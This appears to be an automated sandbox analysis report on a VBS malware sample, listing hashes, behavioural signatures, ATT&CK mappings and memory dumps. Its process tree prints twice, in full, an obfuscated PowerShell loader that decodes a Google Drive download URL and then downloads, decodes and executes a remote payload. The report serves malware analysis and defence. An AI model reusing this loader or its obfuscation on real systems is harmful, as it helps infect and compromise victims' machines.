c077a80b84a9a7957cd634590a6592e1d147d8cc117f3217de85156a7b51de0a

General

Target

c077a80b84a9a7957cd634590a6592e1d147d8cc117f3217de85156a7b51de0a.vbs
Size

39KB
MD5

bb5aac6e774452e8c2c1326398ab7d30
SHA1

bc58b34f069a19c31f241dac4161686b244c9e67
SHA256

c077a80b84a9a7957cd634590a6592e1d147d8cc117f3217de85156a7b51de0a
SHA512

617476c775c40a94c34fad1cdea9f4eae1efa5fb5bb35d5e1a1460c817a6a7bf2bc10d78e5c69df26bb0b18b5d5c9314e315e9c609491b54631f50f8a33e9055
SSDEEP

384:u01gBhZUIWz0AujGKoCJmMuttrW6ku83V3aiHw+tnXPR0q9hWPZyTHO8xfmux1C+:u01gBhXWAZGc8NnKwiQMnCG89KfRei

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

16 drive.google.com
17 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1488 4060 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

3336 powershell.exe
3336 powershell.exe
4060 powershell.exe
4060 powershell.exe
4060 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3336 powershell.exe
Token: SeDebugPrivilege 4060 powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation	WScript.exe

flow	ioc
16	drive.google.com
17	drive.google.com

pid	pid_target	process	target process
1488	4060	WerFault.exe	powershell.exe

pid	process
3336	powershell.exe
3336	powershell.exe
4060	powershell.exe
4060	powershell.exe
4060	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3336	powershell.exe
Token: SeDebugPrivilege	4060	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2368 wrote to memory of 3336	2368	WScript.exe	powershell.exe
PID 2368 wrote to memory of 3336	2368	WScript.exe	powershell.exe
PID 3336 wrote to memory of 5092	3336	powershell.exe	cmd.exe
PID 3336 wrote to memory of 5092	3336	powershell.exe	cmd.exe
PID 3336 wrote to memory of 4060	3336	powershell.exe	powershell.exe
PID 3336 wrote to memory of 4060	3336	powershell.exe	powershell.exe
PID 3336 wrote to memory of 4060	3336	powershell.exe	powershell.exe
PID 4060 wrote to memory of 4008	4060	powershell.exe	cmd.exe
PID 4060 wrote to memory of 4008	4060	powershell.exe	cmd.exe
PID 4060 wrote to memory of 4008	4060	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c077a80b84a9a7957cd634590a6592e1d147d8cc117f3217de85156a7b51de0a.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Dominerede Tryknaptelefonernes Emaljeringens Overseeding Atlaser #>;$Uafhngighedserklringers=(cmd /c set /A 115^^0);Function Heterophemize ([String]$assentatious){$Calmest=[char][int]$Uafhngighedserklringers+'ubstring';$Prioninae=8;$Misbind=Femtenaarigt($assentatious);For($Incontractile=7; $Incontractile -lt $Misbind; $Incontractile+=$Prioninae){$Unproportionably=$assentatious.$Calmest.Invoke($Incontractile, 1);$brintbombes=$brintbombes+$Unproportionably;}$brintbombes;}function Preceptory255 ($Stalkoes){& ($spicae) ($Stalkoes);}function Femtenaarigt ([String]$Alisma){$Ligaturers=$Alisma.Length-1;$Ligaturers;}$Lymphographic=Heterophemize 'AccrediT ,culinrLangsynaCarpettnMyel.grs brdfrufBarmhjee OpkaldrFritidsrem,linei Rec,pinBougetmgAurikle ';$Ambulancen=Heterophemize ' my dighBeav rptOvervaatLillejup olitics Pterop:tex,man/ Antage/ ,tringdPrivatsrGrund kiAutopolvd.valuee W.ding.KissejagFuretcooU ificaoMetaposgMindleslKapslenePicolin. E erpac,jernsyo thrawnmChanger/so,tieduGustfu c arvist? Kammere Sub hrxM rinatp cougaro AbilenrColeadet Occlus=HeilyekdForstanoRste,enwSjaskrenTa nioglResistaoVoltasjaro,antidUrethri&Planishi CordurdBlaastj=Signifi1 SnniksiDestabivUdskifte IbenhomSjler,mmP,njabigOmgngern.seudodMBer,gniaBrokkenv AfterfnBullpupsModerensArrestmBnapoleos PolitiYSeriocovBadesep_ TrageltEngleneuReable.q For,mepMatrili7Ailuropu Sunnudk.antasiCRetightw pstter3snylte 0ElderlyzKernsfrrSyvmileB Transv ';$spicae=Heterophemize 'StavemaiImmortaeProduktxObskure ';$Officinerne=Heterophemize 'sammenf$ Paleo.g .pejlglSnidefio Nondomb econsiaUnbisholOrdning:SaffronRStoreblanonevapa Factork VaretaoPaillonsMhokongtW immieePaaduttnSiganid1 Denatu1Basuner0 .rythr irring= Milieu So.vablS FencintRakkereaTholeitrForldeltExporta- Unebb.BLajkaariAtionsptOverr.lsFelonypT.akerobr U gennaKutymennForaarssUnpleasfAircheceAktieserbullswo b.byrde- KagespSCutoceloNonideauPa.ametrChefd.lc forb ueTr antc M.ndic$ThomasiAReaccommOmg.gerbDatalinuPropo,tlTe efonaSolemnine.keltsc adiolue hul innEaverej Compunc-V lpecuDCabresteom rsels FejltltDisturbi Akt onnKredsr aofficiat Udrejsi nkebokoSemi amnMeningo Planetb$UdfoldeKtred,lelFysi,teacensussv DatabaeBondagerBrugerdnimp gnes Tel,gr1 Twen,e6 Indane6Offent. ';Preceptory255 (Heterophemize ' Enzym $TrooshlgVibe.nelErnringo Bed etbFi,mwaraNorpinil hippop:MenostaKO.tbowll pigeonaOpspolivS.rambleAnfrsl r Ind emnMetapecsBliniss1Tyv rif6Ismejer6 Tri,on= Slovak$Aguishce Ene.gin TurkopvSpatiet:Unhostia.olkrempJotisarp ArmourdAbsurd,aSk,belitLa,onisaDiletta ') ;Preceptory255 (Heterophemize 'Cladoc I Spend mZugtierpKnopskuopigfishrAabnerntUnm.mor- DrivelM EndosaoFort,dedBrystbeuLucinidl udtry,e.elbeha CreedsaBGalioneiCedertrtUdbr.disJurisdiTUdjvninrGravimeaChamelenSuperins hinustfExper ee Dj.bour.arkeds ') ;$Klaverns166=$Klaverns166+'\Aflseligt98.Ban' ;Preceptory255 (Heterophemize 'Vigepli$HerreekgStopinglCentereo OplrinbFistifyaV,ndkmml artogr:BrikettOStr ereeIldlsnoi Frgemml AlengtlTransvai For edaoak.nshd forgo =Gr.ndig( TekstiTSpiculieFo.estisM.stikutSkurern-Bvreg.sPRealiteamesol,gtBrystflhStumpyo Ratific$ .oindiK Je.tjelHomelinaNonli evDowl ske Endiv.rlituitinPlagaldsA,erroi1Elbowyh6inf,rmi6 .otoal)Alismad ') ;while (-not $Oeilliad) {Preceptory255 (Heterophemize ' KhiladI,hernesfRebirth pirker(assames$p,ydsplR ,uinisaRums.eraIncunabkPetaledodomsubdsIsabe.itCervicoe EmpiernKrydsre1Slankes1Condone0 Antife.BeregniJarchipeoJamesonbKa kaskS Udsmugt Sid.liadepilattTiltrkdeDelete. Noma.ep-RedouteeUddann,q Maskin spinets$MalpropL Regrouy.aahvilmSt uktup SexbomhNondisco Incommg Traktrr S.ccadaConvalepViceroyhNotendeiBortelic Blodfe)Subpara Ver efd{GerbillS ,pedittEnetageaProgramrCheffortKa,jasn-,irkuleSYnkeliglArylatieUnsympteMormotvpA,iosie Pre,se1 S.acke}DisputeeudmagrelSeamostsTempe aeVok.kas{ Fl ntgS spindltWienerpaBo,swanrRisottotTheftpr-ShellumSPalaeoplSaltiefeDu.miese,mmanenpeventyr Spidsbu1Smittle;Rec,rcePAeromecrTranschestor jecColourieYdelsesp Hvirvltbortrejo NonequrombygniySvanefi2Muddypi5 Lichen5Sleekne Ma.roev$S athinOAfklarif An.emafCheesiniFlowerbc Pachyhi MillennBarnstoespil,evrSupere,nbryd,ineKvaltes}Inferir ');Preceptory255 (Heterophemize 'Therian$Vierspig TankeblEssoinmoFrankofb PercesaFuti itl Nudist:InfantiO DuopoleRockieuiSogg esl LaurealMiksturiEndopleaFarvevad.odosit=Borde.m(Til irkTPreguileMetallisOverwhitH ydenj-RecipiePTilrettaSlagordtSpe,ialh R,alit Despoi.$BevilliKRapill.lrevolteaKravspevIn stnieInfiel rSternitnIndk,desTitoism1 Sandst6M.sopar6To rels)kekunap ') ;}Preceptory255 (Heterophemize 'Trl emr$Clearagg RelstalskyderioAttraavb F.eckeaArkiv,llBltekre: C.licoAProduktlnondeliiOperatid l getaaLovershsHjemmeb Jentjen=Cli.ati PrintenG MinusgeSpecialtUrinemi-WhistleCUnma mooUfoernen Unrecut Kach,heGeo etrnTu.gysetFolkeko E,hicia$ Hair.cK urhedelP,rtakeaVanvittv ethenaeAn urisrMrklggenTelefons Kvetch1Orpimen6 Le ned6Reveget ');Preceptory255 (Heterophemize ' Adelsg$ xtispig TomatilAdvokato BriksebLeisuraa.ariflnl Mundbl: Priv.tARealkresRe njoitSendingaZoilismrskovmyre ftappe Ditetik=st affe Straale[TvanmelS diktery HexammsDannematP ajeraeIndsejlmCompart.Maddi.gC Spor no SetternSurmi ivChlori.e,mpliturGalv nst,vsprin]Corkeds:Counter:Flow.ffFOpruln,rDrejefdoCostersmForekomBDeklassaglucosisLoadingeEpithal6An.ende4T.dsskrSFo masttOp,lussrDeterreiEchogran gallergHankatt( Kokkep$SkmbillARovingulTaxi haiTuristcd GnomicaDiglyphsSmukkeb)harpune ');Preceptory255 (Heterophemize ' uptime$ Concergpal tabl Uninclo Bedr,gbKartoffa FibrstlS.eered: Fla laOTroadblcHorisontRednin,obuddi,ud MinineeReindorc StedmoiStrggarl Colonil,holedoiDaddelpo,alvanonDkra be tertor=.nenigm Cryptoa[Redist.Swr ckagyunantagsDecembrtAncipiteScrapbomSexbo b. OccipiTA,tensteB gyndexBndel,ttDressie.BehatteE .latrenHistoricMargi,aoEksploddRegistricongolenSpraying Precis].eciphe:skadesf:KejsertA Ap romSWichhj.C PaabydI HypothITempelh.SkalaruGRegangeeTotalentVrdispiSt,nacultStephanrRijsttai Fort.ln Uhvi,kg Megace(Dualite$SipeoxcACa,elops Tri,art Bronc,aIsokerarVedhol e Al.olf)S ancer ');Preceptory255 (Heterophemize 'Arbu,us$Undemo.gChoirlilOraleroospildinbHedgehoaNvn.ngelForsbni:PseudoiRCab llmeRe.lisepAabenbaaLitiscoihaemninn Imperitmoonheai.eucobrn.entathgF.ehorn=Hellery$OfftracOElectivcHjrdisstSnr huloMallea,d Renteie KreposcArbejdsiBere,nilAfrejs,lForeloeiForebygokelltypn aubits.MonocoesEnfo.ceuUgennemb Fdselss G lanttUndeviorNicoti,iFootlednKursusogUndetr ( Selvfo3manifes1Targumi7Venners9 Formul8Leafcup4 Sqqtve,overacc3Womanli0Aesthet9.edakti9Forhaan2Outligg)Aeropla ');Preceptory255 $Repainting;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3336

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
3⤵
PID:5092

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Dominerede Tryknaptelefonernes Emaljeringens Overseeding Atlaser #>;$Uafhngighedserklringers=(cmd /c set /A 115^^0);Function Heterophemize ([String]$assentatious){$Calmest=[char][int]$Uafhngighedserklringers+'ubstring';$Prioninae=8;$Misbind=Femtenaarigt($assentatious);For($Incontractile=7; $Incontractile -lt $Misbind; $Incontractile+=$Prioninae){$Unproportionably=$assentatious.$Calmest.Invoke($Incontractile, 1);$brintbombes=$brintbombes+$Unproportionably;}$brintbombes;}function Preceptory255 ($Stalkoes){& ($spicae) ($Stalkoes);}function Femtenaarigt ([String]$Alisma){$Ligaturers=$Alisma.Length-1;$Ligaturers;}$Lymphographic=Heterophemize 'AccrediT ,culinrLangsynaCarpettnMyel.grs brdfrufBarmhjee OpkaldrFritidsrem,linei Rec,pinBougetmgAurikle ';$Ambulancen=Heterophemize ' my dighBeav rptOvervaatLillejup olitics Pterop:tex,man/ Antage/ ,tringdPrivatsrGrund kiAutopolvd.valuee W.ding.KissejagFuretcooU ificaoMetaposgMindleslKapslenePicolin. E erpac,jernsyo thrawnmChanger/so,tieduGustfu c arvist? Kammere Sub hrxM rinatp cougaro AbilenrColeadet Occlus=HeilyekdForstanoRste,enwSjaskrenTa nioglResistaoVoltasjaro,antidUrethri&Planishi CordurdBlaastj=Signifi1 SnniksiDestabivUdskifte IbenhomSjler,mmP,njabigOmgngern.seudodMBer,gniaBrokkenv AfterfnBullpupsModerensArrestmBnapoleos PolitiYSeriocovBadesep_ TrageltEngleneuReable.q For,mepMatrili7Ailuropu Sunnudk.antasiCRetightw pstter3snylte 0ElderlyzKernsfrrSyvmileB Transv ';$spicae=Heterophemize 'StavemaiImmortaeProduktxObskure ';$Officinerne=Heterophemize 'sammenf$ Paleo.g .pejlglSnidefio Nondomb econsiaUnbisholOrdning:SaffronRStoreblanonevapa Factork VaretaoPaillonsMhokongtW immieePaaduttnSiganid1 Denatu1Basuner0 .rythr irring= Milieu So.vablS FencintRakkereaTholeitrForldeltExporta- Unebb.BLajkaariAtionsptOverr.lsFelonypT.akerobr U gennaKutymennForaarssUnpleasfAircheceAktieserbullswo b.byrde- KagespSCutoceloNonideauPa.ametrChefd.lc forb ueTr antc M.ndic$ThomasiAReaccommOmg.gerbDatalinuPropo,tlTe efonaSolemnine.keltsc adiolue hul innEaverej Compunc-V lpecuDCabresteom rsels FejltltDisturbi Akt onnKredsr aofficiat Udrejsi nkebokoSemi amnMeningo Planetb$UdfoldeKtred,lelFysi,teacensussv DatabaeBondagerBrugerdnimp gnes Tel,gr1 Twen,e6 Indane6Offent. ';Preceptory255 (Heterophemize ' Enzym $TrooshlgVibe.nelErnringo Bed etbFi,mwaraNorpinil hippop:MenostaKO.tbowll pigeonaOpspolivS.rambleAnfrsl r Ind emnMetapecsBliniss1Tyv rif6Ismejer6 Tri,on= Slovak$Aguishce Ene.gin TurkopvSpatiet:Unhostia.olkrempJotisarp ArmourdAbsurd,aSk,belitLa,onisaDiletta ') ;Preceptory255 (Heterophemize 'Cladoc I Spend mZugtierpKnopskuopigfishrAabnerntUnm.mor- DrivelM EndosaoFort,dedBrystbeuLucinidl udtry,e.elbeha CreedsaBGalioneiCedertrtUdbr.disJurisdiTUdjvninrGravimeaChamelenSuperins hinustfExper ee Dj.bour.arkeds ') ;$Klaverns166=$Klaverns166+'\Aflseligt98.Ban' ;Preceptory255 (Heterophemize 'Vigepli$HerreekgStopinglCentereo OplrinbFistifyaV,ndkmml artogr:BrikettOStr ereeIldlsnoi Frgemml AlengtlTransvai For edaoak.nshd forgo =Gr.ndig( TekstiTSpiculieFo.estisM.stikutSkurern-Bvreg.sPRealiteamesol,gtBrystflhStumpyo Ratific$ .oindiK Je.tjelHomelinaNonli evDowl ske Endiv.rlituitinPlagaldsA,erroi1Elbowyh6inf,rmi6 .otoal)Alismad ') ;while (-not $Oeilliad) {Preceptory255 (Heterophemize ' KhiladI,hernesfRebirth pirker(assames$p,ydsplR ,uinisaRums.eraIncunabkPetaledodomsubdsIsabe.itCervicoe EmpiernKrydsre1Slankes1Condone0 Antife.BeregniJarchipeoJamesonbKa kaskS Udsmugt Sid.liadepilattTiltrkdeDelete. Noma.ep-RedouteeUddann,q Maskin spinets$MalpropL Regrouy.aahvilmSt uktup SexbomhNondisco Incommg Traktrr S.ccadaConvalepViceroyhNotendeiBortelic Blodfe)Subpara Ver efd{GerbillS ,pedittEnetageaProgramrCheffortKa,jasn-,irkuleSYnkeliglArylatieUnsympteMormotvpA,iosie Pre,se1 S.acke}DisputeeudmagrelSeamostsTempe aeVok.kas{ Fl ntgS spindltWienerpaBo,swanrRisottotTheftpr-ShellumSPalaeoplSaltiefeDu.miese,mmanenpeventyr Spidsbu1Smittle;Rec,rcePAeromecrTranschestor jecColourieYdelsesp Hvirvltbortrejo NonequrombygniySvanefi2Muddypi5 Lichen5Sleekne Ma.roev$S athinOAfklarif An.emafCheesiniFlowerbc Pachyhi MillennBarnstoespil,evrSupere,nbryd,ineKvaltes}Inferir ');Preceptory255 (Heterophemize 'Therian$Vierspig TankeblEssoinmoFrankofb PercesaFuti itl Nudist:InfantiO DuopoleRockieuiSogg esl LaurealMiksturiEndopleaFarvevad.odosit=Borde.m(Til irkTPreguileMetallisOverwhitH ydenj-RecipiePTilrettaSlagordtSpe,ialh R,alit Despoi.$BevilliKRapill.lrevolteaKravspevIn stnieInfiel rSternitnIndk,desTitoism1 Sandst6M.sopar6To rels)kekunap ') ;}Preceptory255 (Heterophemize 'Trl emr$Clearagg RelstalskyderioAttraavb F.eckeaArkiv,llBltekre: C.licoAProduktlnondeliiOperatid l getaaLovershsHjemmeb Jentjen=Cli.ati PrintenG MinusgeSpecialtUrinemi-WhistleCUnma mooUfoernen Unrecut Kach,heGeo etrnTu.gysetFolkeko E,hicia$ Hair.cK urhedelP,rtakeaVanvittv ethenaeAn urisrMrklggenTelefons Kvetch1Orpimen6 Le ned6Reveget ');Preceptory255 (Heterophemize ' Adelsg$ xtispig TomatilAdvokato BriksebLeisuraa.ariflnl Mundbl: Priv.tARealkresRe njoitSendingaZoilismrskovmyre ftappe Ditetik=st affe Straale[TvanmelS diktery HexammsDannematP ajeraeIndsejlmCompart.Maddi.gC Spor no SetternSurmi ivChlori.e,mpliturGalv nst,vsprin]Corkeds:Counter:Flow.ffFOpruln,rDrejefdoCostersmForekomBDeklassaglucosisLoadingeEpithal6An.ende4T.dsskrSFo masttOp,lussrDeterreiEchogran gallergHankatt( Kokkep$SkmbillARovingulTaxi haiTuristcd GnomicaDiglyphsSmukkeb)harpune ');Preceptory255 (Heterophemize ' uptime$ Concergpal tabl Uninclo Bedr,gbKartoffa FibrstlS.eered: Fla laOTroadblcHorisontRednin,obuddi,ud MinineeReindorc StedmoiStrggarl Colonil,holedoiDaddelpo,alvanonDkra be tertor=.nenigm Cryptoa[Redist.Swr ckagyunantagsDecembrtAncipiteScrapbomSexbo b. OccipiTA,tensteB gyndexBndel,ttDressie.BehatteE .latrenHistoricMargi,aoEksploddRegistricongolenSpraying Precis].eciphe:skadesf:KejsertA Ap romSWichhj.C PaabydI HypothITempelh.SkalaruGRegangeeTotalentVrdispiSt,nacultStephanrRijsttai Fort.ln Uhvi,kg Megace(Dualite$SipeoxcACa,elops Tri,art Bronc,aIsokerarVedhol e Al.olf)S ancer ');Preceptory255 (Heterophemize 'Arbu,us$Undemo.gChoirlilOraleroospildinbHedgehoaNvn.ngelForsbni:PseudoiRCab llmeRe.lisepAabenbaaLitiscoihaemninn Imperitmoonheai.eucobrn.entathgF.ehorn=Hellery$OfftracOElectivcHjrdisstSnr huloMallea,d Renteie KreposcArbejdsiBere,nilAfrejs,lForeloeiForebygokelltypn aubits.MonocoesEnfo.ceuUgennemb Fdselss G lanttUndeviorNicoti,iFootlednKursusogUndetr ( Selvfo3manifes1Targumi7Venners9 Formul8Leafcup4 Sqqtve,overacc3Womanli0Aesthet9.edakti9Forhaan2Outligg)Aeropla ');Preceptory255 $Repainting;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
4⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 2476
4⤵
- Program crash
PID:1488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4060 -ip 4060
1⤵
PID:4560

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vf1df2n2.nl5.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3336-20-0x00007FF9FAED0000-0x00007FF9FB991000-memory.dmp

Filesize
10.8MB

Download
memory/3336-10-0x00007FF9FAED0000-0x00007FF9FB991000-memory.dmp

Filesize
10.8MB

Download
memory/3336-11-0x0000014F1FFB0000-0x0000014F1FFC0000-memory.dmp

Filesize
64KB

Download
memory/3336-12-0x0000014F1FFB0000-0x0000014F1FFC0000-memory.dmp

Filesize
64KB

Download
memory/3336-13-0x0000014F3A8C0000-0x0000014F3A8E6000-memory.dmp

Filesize
152KB

Download
memory/3336-14-0x0000014F3A910000-0x0000014F3A924000-memory.dmp

Filesize
80KB

Download
memory/3336-15-0x0000014F1FFB0000-0x0000014F1FFC0000-memory.dmp

Filesize
64KB

Download
memory/3336-16-0x0000014F1FFB0000-0x0000014F1FFC0000-memory.dmp

Filesize
64KB

Download
memory/3336-48-0x00007FF9FAED0000-0x00007FF9FB991000-memory.dmp

Filesize
10.8MB

Download
memory/3336-44-0x0000014F1FFB0000-0x0000014F1FFC0000-memory.dmp

Filesize
64KB

Download
memory/3336-6-0x0000014F3A800000-0x0000014F3A822000-memory.dmp

Filesize
136KB

Download
memory/4060-22-0x0000000005670000-0x0000000005692000-memory.dmp

Filesize
136KB

Download
memory/4060-38-0x0000000006B30000-0x0000000006B4A000-memory.dmp

Filesize
104KB

Download
memory/4060-19-0x0000000002DC0000-0x0000000002DD0000-memory.dmp

Filesize
64KB

Download
memory/4060-23-0x0000000005710000-0x0000000005776000-memory.dmp

Filesize
408KB

Download
memory/4060-24-0x0000000005E20000-0x0000000005E86000-memory.dmp

Filesize
408KB

Download
memory/4060-34-0x0000000005F50000-0x00000000062A4000-memory.dmp

Filesize
3.3MB

Download
memory/4060-35-0x0000000006540000-0x000000000655E000-memory.dmp

Filesize
120KB

Download
memory/4060-36-0x00000000065E0000-0x000000000662C000-memory.dmp

Filesize
304KB

Download
memory/4060-37-0x0000000007DA0000-0x000000000841A000-memory.dmp

Filesize
6.5MB

Download
memory/4060-21-0x00000000057F0000-0x0000000005E18000-memory.dmp

Filesize
6.2MB

Download
memory/4060-39-0x00000000077C0000-0x0000000007856000-memory.dmp

Filesize
600KB

Download
memory/4060-40-0x0000000007760000-0x0000000007782000-memory.dmp

Filesize
136KB

Download
memory/4060-41-0x00000000089D0000-0x0000000008F74000-memory.dmp

Filesize
5.6MB

Download
memory/4060-42-0x0000000007790000-0x00000000077B2000-memory.dmp

Filesize
136KB

Download
memory/4060-43-0x0000000007A30000-0x0000000007A44000-memory.dmp

Filesize
80KB

Download
memory/4060-17-0x0000000002C10000-0x0000000002C46000-memory.dmp

Filesize
216KB

Download
memory/4060-45-0x0000000074B20000-0x00000000752D0000-memory.dmp

Filesize
7.7MB

Download
memory/4060-18-0x0000000074B20000-0x00000000752D0000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing